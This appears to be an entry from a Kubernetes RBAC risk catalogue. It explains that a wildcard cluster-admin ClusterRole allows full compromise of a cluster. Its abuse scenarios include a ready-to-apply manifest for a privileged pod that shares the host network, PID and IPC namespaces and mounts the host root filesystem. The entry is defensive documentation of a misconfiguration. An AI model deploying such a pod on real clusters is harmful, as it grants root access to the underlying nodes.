Overview

FieldValue
ID1060
NameWildcard permission on all resources cluster-wide (Cluster Admin)
Risk CategoryElevation of Privilege
Risk LevelCritical
Role TypeClusterRole
API Groups*
Resources*
Verbs*
TagsClusterAdminAccess DenialOfService InformationDisclosure PrivilegeEscalation Spoofing (+2 more)

Description

Grants unrestricted, wildcard (’*’) access to all API groups, resources, and verbs across the entire cluster. This is equivalent to full cluster administrator privileges, allowing complete control and compromise of the Kubernetes cluster.

Abuse Scenarios

  1. List all resources across all namespaces (demonstrates broad read access).
kubectl get all --all-namespaces
  1. Create a privileged pod with full host access (demonstrates full control).
kubectl create -n <namespace> -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: cluster-admin-pod
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: attacker
    image: busybox
    command: ["/bin/sh", "-c", "sleep infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: host-root
  volumes:
  - name: host-root
    hostPath:
      path: /
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF